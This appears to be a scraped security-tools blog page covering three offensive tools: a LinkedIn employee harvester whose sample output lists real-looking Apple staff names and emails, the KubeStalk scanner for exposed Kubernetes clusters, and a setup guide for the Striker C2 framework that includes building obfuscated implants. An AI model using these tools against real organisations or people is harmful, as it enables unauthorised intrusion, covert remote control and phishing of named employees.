โ–’โ–ˆโ–ˆโ–‘ โ–‘โ–ˆโ–ˆโ–‘โ–“โ–ˆโ–ˆโ–’ โ–โ–Œโ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆ โ–ˆโ–„ โ–’โ–“โ–ˆ โ–„ โ–‘โ–“โ–ˆโ–„ โ–Œ&# 9617;โ–ˆโ–ˆโ–‘โ–“โ–ˆโ–ˆโ–’ โ–โ–Œโ–ˆโ–ˆโ–’โ–‘โ–“โ–ˆโ–„ โ–Œโ–“โ–“โ–ˆ โ–‘โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆ โ–’โ–ˆโ–ˆ โ–’โ–ˆโ–ˆโ–„โ–ˆโ–“โ–’ โ–’โ–’โ–“โ–ˆ โ–„ โ–’โ–ˆโ–ˆโ–€โ–€โ–ˆโ–„
โ–‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–’โ–‘โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆโ–‘ โ–“โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆโ–’ โ–ˆโ–„โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–’โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–“ โ–‘โ–ˆโ–ˆโ–‘โ–’โ–ˆโ–ˆโ–‘ โ–“โ–ˆโ–ˆโ–‘โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–“ โ–’โ–’โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–“ โ–’โ–ˆโ–ˆโ–’ โ–‘โ–ˆโ–ˆโ–’โ–’โ–ˆโ–ˆโ–’ โ–‘ โ–‘โ–‘โ–’โ–ˆโ–ˆโ–ˆโ–ˆ& #9618;โ–‘โ–ˆโ–ˆโ–“ โ–’โ–ˆโ–ˆโ–’
โ–‘ โ–’โ–‘โ–“ โ–‘โ–‘โ–“ โ–‘ โ–’โ–‘ โ–’ โ–’ โ–’ โ–’โ–’ โ–“โ–’โ–‘โ–‘ โ–’โ–‘ โ–‘ โ–’โ–’โ–“ โ–’ โ–‘โ–“ โ–‘ โ–’โ–‘ โ–’ โ–’ โ–’โ–’โ–“ โ–’ โ–‘โ–’โ–“โ–’ โ–’ โ–’ โ–‘ โ–’โ–‘ โ–‘ โ–‘โ–’โ–“โ–’โ–‘ โ–‘ โ–‘โ–‘โ–‘ โ–’โ–‘ โ–‘โ–‘ โ–’โ–“ โ–‘โ–’โ–“โ–‘
โ–‘ โ–‘ โ–’ โ–‘ โ–’ โ–‘โ–‘ โ–‘โ–‘ โ–‘ โ–’โ–‘โ–‘ โ–‘โ–’ โ–’โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–’ โ–’ โ–’ โ–‘โ–‘ โ–‘โ–‘ โ–‘ โ–’โ–‘ โ–‘ โ–’ โ–’ โ–‘โ–‘โ–’โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘โ–’ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–’ โ–‘ โ–’โ–‘
โ–‘ โ–‘ โ–’ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–’ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘โ–‘ โ–‘ โ–‘โ–‘ โ–‘
โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘ โ–‘
โ–‘ โ–‘ โ–‘ by LRVT

[i] Company Name: apple
[i] Company X-ID: 162479
[i] LN Employees: 1000 employees found
[i] Dumping Date: 17/10/2022 13:55:06
[i] Email Format: {0}.{1}@apple.de
Firstname;Lastname;Email;Position;Gender;Location;Profile
Katrin;Honauer;katrin.honauer@apple.com;Software Engineer at Apple;N/A;Heidelberg;https://www.linkedin.com/in/katrin-honauer
Raymond;Chen;raymond.chen@apple.com;Recruiting at Apple;N/A;Austin, Texas Metropolitan Area;https://www.linkedin.com/in/raytherecruiter

[i] Successfully crawled 2 unique apple employee(s). Hurray ^_-

Limitations

LinkedIn will allow only the first 1,000 search results to be returned when harvesting contact information. You may also need a LinkedIn premium account when you reached the maximum allowed queries for visiting profiles with your freemium LinkedIn account.

Furthermore, not all employee profiles are public. The results vary depending on your used LinkedIn account and whether you are befriended with some employees of the company to crawl or not. Therefore, it is sometimes not possible to retrieve the firstname, lastname and profile url of some employee accounts. The script will not display such profiles, as they contain default values such as "LinkedIn" as firstname and "Member" in the lastname. If you want to include such private profiles, please use the CLI flag --include-private-profiles. Although some accounts may be private, we can obtain the position (title) as well as the location of such accounts. Only firstname, lastname and profile URL are hidden for private LinkedIn accounts.

Finally, LinkedIn users are free to name their profile. An account name can therefore consist of various things such as saluations, abbreviations, emojis, middle names etc. I tried my best to remove some nonsense. However, this is not a complete solution to the general problem. Note that we are not using the official LinkedIn API. This script gathers information from the "unofficial" Voyager API.



KubeStalk - Discovers Kubernetes And Related Infrastructure Based Attack Surface From A Black-Box Perspective

ย 


KubeStalk is a tool to discover Kubernetes and related infrastructure based attack surface from a black-box perspective. This tool is a community version of the tool used to probe for unsecured Kubernetes clusters around the internet during Project Resonance - Wave 9.


Usage

The GIF below demonstrates usage of the tool:


Installation

KubeStalk is written in Python and requires the requests library.

To install the tool, you can clone the repository to any directory:

git clone https://github.com/redhuntlabs/kubestalk

Once cloned, you need to install the requests library using python3 -m pip install requests or:

python3 -m pip install -r requirements.txt

Everything is setup and you can use the tool directly.

Command-line Arguments

A list of command line arguments supported by the tool can be displayed using the -h flag.

$ python3 kubestalk.py  -h

+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1

[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

usage: ./kubestalk.py <url(s)>/<cidr>

Required Arguments:
urls List of hosts to scan

Optional Arguments:
-o OUTPUT, --output OUTPUT
Output path to write the CSV file to
-f SIG_FILE, --sig-dir SIG_FILE
Signature directory path to load
-t TIMEOUT, --timeout TIMEOUT
HTTP timeout value in seconds
-ua USER_AGENT, --user-agent USER_AGENT
User agent header t o set in HTTP requests
--concurrency CONCURRENCY
No. of hosts to process simultaneously
--verify-ssl Verify SSL certificates
--version Display the version of KubeStalk and exit.

Basic Usage

To use the tool, you can pass one or more hosts to the script. All targets passed to the tool must be RFC 3986 complaint, i.e. must contain a scheme and hostname (and port if required).

A basic usage is as below:

$ python3 kubestalk.py https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆโ–ˆ:10250

+---------------------+
| K U B E S T A L K |
+---------------------+ v0.1

[!] KubeStalk by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[!] Author: 0xInfection (RHL Research Team)
[!] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.

[+] Loaded 10 signatures to scan.
[*] Processing host: https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ:10250
[!] Found potential issue on https://โ–ˆโ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆโ–ˆ:10250: Kubernetes Pod List Exposure
[*] Writing results to output file.
[+] Done.

HTTP Tuning

HTTP requests can be fine-tuned using the -t (to mention HTTP timeouts), -ua (to specify custom user agents) and the --verify-ssl (to validate SSL certificates while making requests).

Concurrency

You can control the number of hosts to scan simultanously using the --concurrency flag. The default value is set to 5.

Output

The output is written to a CSV filea and can be controlled by the --output flag.

A sample of the CSV output rendered in markdown is as belows:

host path issue type severity
https://โ–ˆ.โ–ˆ.โ–ˆ.โ–ˆ:10250 /pods Kubernetes Pod List Exposure core-component vulnerability/misconfiguration
https://โ–ˆ.โ–ˆ.โ–ˆ.โ–ˆ:443 /api/v1/pods Kubernetes Pod List Exposure core-component vulnerability/misconfiguration
http://โ–ˆ.โ–ˆ.โ–ˆโ–ˆ.โ–ˆ:80 / etcd Viewer Dashboard Exposure add-on vulnerability/exposure
http://โ–ˆโ–ˆ.โ–ˆโ–ˆ.โ–ˆ.โ–ˆ:80 / cAdvisor Metrics Web UI Dashboard Exposure add-on vulnerability/exposure

Version & License

The tool is licensed under the BSD 3 Clause License and is currently at v0.1.

To know more about our Attack Surface Management platform, check out NVADR.



Striker - A Command And Control (C2)


Striker is a simple Command and Control (C2) program.


Disclaimer

This project is under active development. Most of the features are experimental, with more to come. Expect breaking changes.

Features

A) Agents

  • Native agents for linux and windows hosts.
  • Self-contained, minimal python agent should you ever need it.
  • HTTP(s) channels.
  • Aynchronous tasks execution.
  • Support for multiple redirectors, and can fallback to others when active one goes down.

B) Backend / Teamserver

  • Supports multiple operators.
  • Most features exposed through the REST API, making it easy to automate things.
  • Uses web sockets for faster comms.

C) User Interface

  • Smooth and reactive UI thanks to Svelte and SocketIO.
  • Easy to configure as it compiles into static HTML, JavaScript, and CSS files, which can be hosted with even the most basic web server you can find.
  • Teamchat feature to communicate with other operators over text.

Installing Striker

Clone the repo;

$ git clone https://github.com/4g3nt47/Striker.git
$ cd Striker

The codebase is divided into 4 independent sections;

1. The C2 Server / Backend

This handles all server-side logic for both operators and agents. It is a NodeJS application made with;

  • express - For the REST API.
  • socket.io - For Web Socket communtication.
  • mongoose - For connecting to MongoDB.
  • multer - For handling file uploads.
  • bcrypt - For hashing user passwords.

The source code is in the backend/ directory. To setup the server;

  1. Setup a MongoDB database;

Striker uses MongoDB as backend database to store all important data. You can install this locally on your machine using this guide for debian-based distros, or create a free one with MongoDB Atlas (A database-as-a-service platform).

  1. Move into the source directory;
$ cd backend
  1. Install dependencies;
$ npm install
  1. Create a directory for static files;
$ mkdir static

You can use this folder to host static files on the server. This should also be where your UPLOAD_LOCATION is set to in the .env file (more on this later), but this is not necessary. Files in this directory will be publicly accessible under the path /static/.

  1. Create a .env file;

NOTE: Values between < and > are placeholders. Replace them with appropriate values (including the <>). For fields that require random strings, you can generate them easily using;

$ head -c 100 /dev/urandom | sha256sum
DB_URL=<your MongoDB connection URL>
HOST=<host to listen on (default: 127.0.0.1)>
PORT=<port to listen on (default: 3000)>
SECRET=<random string to use for signing session cookies and encrypting session data>
ORIGIN_URL=<full URL of the server you will be hosting the frontend at. Used to setup CORS>
REGISTRATION_KEY=<random string to use for authentication during signup>
MAX_UPLOAD_SIZE=<max file upload size, in bytes>
UPLOAD_LOCATION=<directory to store uploaded files to (default: static)>
SSL_KEY=<your SSL key file (optional)>
SSL_CERT=<your SSL cert file (optional)>

Note that SSL_KEY and SSL_CERT are optional. If any is not defined, a plain HTTP server will be created. This helps avoid needless overhead when running the server behind an SSL-enabled reverse proxy on the same host.

  1. Start the server;
$ node index.js
[12:45:30 PM] Connecting to backend database...
[12:45:31 PM] Starting HTTP server...
[12:45:31 PM] Server started on port: 3000

2. The Frontend

This is the web UI used by operators. It is a single page web application written in Svelte, and the source code is in the frontend/ directory.

To setup the frontend;

  1. Move into the source directory;
$ cd frontend
  1. Install dependencies;
$ npm install
  1. Create a .env file with the variable VITE_STRIKER_API set to the full URL of the C2 server as configured above;
VITE_STRIKER_API=https://c2.striker.local
  1. Build;
$ npm run build

The above will compile everything into a static web application in dist/ directory. You can move all the files inside into the web root of your web server, or even host it with a basic HTTP server like that of python;

$ cd dist
$ python3 -m http.server 8000
  1. Signup;
  • Open the site in a web browser. You should see a login page.
  • Click on the Register button.
  • Enter a username, password, and the registration key in use (see REGISTRATION_KEY in backend/.env)

This will create a standard user account. You will need an admin account to access some features. Your first admin account must be created manually, afterwards you can upgrade and downgrade other accounts in the Users tab of the web UI.

To create your first admin account;

  • Connect to the MongoDB database used by the backend.
  • Update the users collection and set the admin field of the target user to true;

There are different ways you can do this. If you have mongo available in you CLI, you can do it using;

$ mongo <your MongoDB connection URL>
> db.users.updateOne({username: "<your username>"}, {$set: {admin: true}})

You should get the following response if it works;

{ "acknowledged" : true, "matchedCount" : 1, "modifiedCount" : 1 }

You can now login :)

3. The C2 Redirector

A) Dumb Pipe Redirection

A dumb pipe redirector written for Striker is available at redirector/redirector.py. Obviously, this will only work for plain HTTP traffic, or for HTTPS when SSL verification is disabled (you can do this by enabling the INSECURE_SSL macro in the C agent).

The following example listens on port 443 on all interfaces and forward to c2.example.org on port 443;

$ cd redirector
$ ./redirector.py 0.0.0.0:443 c2.example.org:443
[*] Starting redirector on 0.0.0.0:443...
[+] Listening for connections...

B) Nginx Reverse Proxy as Redirector

  1. Install Nginx;
$ sudo apt install nginx
  1. Create a vhost config (e.g: /etc/nginx/sites-available/striker);

Placeholders;

  • <domain-name> - This is your server's FQDN, and should match the one in you SSL cert.
  • <ssl-cert> - The SSL cert file to use.
  • <ssl-key> - The SSL key file to use.
  • <c2-server> - The full URL of the C2 server to forward requests to.

WARNING: client_max_body_size should be as large as the size defined by MAX_UPLOAD_SIZE in your backend/.env file, or uploads for large files will fail.

server {
listen 443 ssl;
server_name <domain-name>;
ssl_certificate <ssl-cert>;
ssl_certificate_key <ssl-key>;
client_max_body_size 100M;
access_log /var/log/nginx/striker.log;

location / {
proxy_pass <c2-server>;
proxy_redirect off;
proxy_ssl_verify off;
proxy_read_timeout 90;
proxy_http_version 1.0;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
}
  1. Enable it;
$ sudo ln -s /etc/nginx/sites-available/striker /etc/nginx/sites-enabled/striker
  1. Restart Nginx;
$ sudo service nginx restart

Your redirector should now be up and running on port 443, and can be tested using (assuming your FQDN is striker.local);

$ curl https://striker.local

If it works, you should get the 404 response used by the backend, like;

{"error":"Invalid route!"}

4. The Agents (Implants)

A) The C Agent

These are the implants used by Striker. The primary agent is written in C, and is located in agent/C/. It supports both linux and windows hosts. The linux agent depends externally on libcurl, which you will find installed in most systems.

The windows agent does not have an external dependency. It uses wininet for comms, which I believe is available on all windows hosts.

  1. Building for linux

Assuming you're on a 64 bit host, the following will build for 64 host;

$ cd agent/C
$ mkdir bin
$ make

To build for 32 bit on 64;

$ sudo apt install gcc-multilib
$ make arch=32

The above compiles everything into the bin/ directory. You will need only two files to generate working implants;

  • bin/stub - This is the agent stub that will be used as template to generate working implants.
  • bin/builder - This is what you will use to patch the agent stub to generate working implants.

The builder accepts the following arguments;

$ ./bin/builder 
[-] Usage: ./bin/builder <url> <auth_key> <delay> <stub> <outfile>

Where;

  • <url> - The server to report to. This should ideally be a redirector, but a direct URL to the server will also work.
  • <auth_key> - The authentication key to use when connecting to the C2. You can create this in the auth keys tab of the web UI.
  • <delay> - Delay between each callback, in seconds. This should be at least 2, depending on how noisy you want it to be.
  • <stub> - The stub file to read, bin/stub in this case.
  • <outfile> - The output filename of the new implant.

Example;

$ ./bin/builder https://localhost:3000 979a9d5ace15653f8ffa9704611612fc 5 bin/stub bin/striker
[*] Obfuscating strings...
[+] 69 strings obfuscated :)
[*] Finding offsets of our markers...
[+] Offsets:
URL: 0x0000a2e0
OBFS Key: 0x0000a280
Auth Key: 0x0000a2a0
Delay: 0x0000a260
[*] Patching...
[+] Operation completed!
  1. Building for windows

You will need MinGW for this. The following will install the 32 and 64 bit dev windows environment;

$ sudo apt install mingw-w64

Build for 64 bit;

$ cd agent/C
$ mdkir bin
$ make target=win

To compile for 32 bit;

$ make target=win arch=32

This will compile everything into the bin/ directory, and you will have the builder and the stub as bin\stub.exe and bin\builder.exe, respectively.

B) The Python Agent

Striker also comes with a self-contained python agent (tested on python 2.7.16 and 3.7.3). This is located at agent/python/. Only the most basic features are implemented in this agent. Useful for hosts that can't run the C agent but have python installed.

There are 2 file in this directory;

  • stub.py - This is the payload stub to pass to the builder.
  • builder.py - This is what you'll be using to generate an implant.

Usage example:

$ ./builder.py
[-] Usage: builder.py <url> <auth_key> <delay> <stub> <outfile>
# The following will generate a working payload as `output.py`
$ ./builder.py http://localhost:3000 979a9d5ace15653f8ffa9704611612fc 2 stub.py output.py
[*] Loading agent stub...
[*] Writing configs...
[+] Agent built successfully: output.py
# Run it
$ python3 output.py

Getting Started

After following the above instructions, Striker should now be ready for use. Kindly go through the usage guide. Have fun, and happy hacking!

Support

If you like the project, consider helping me turn coffee into code!



โŒ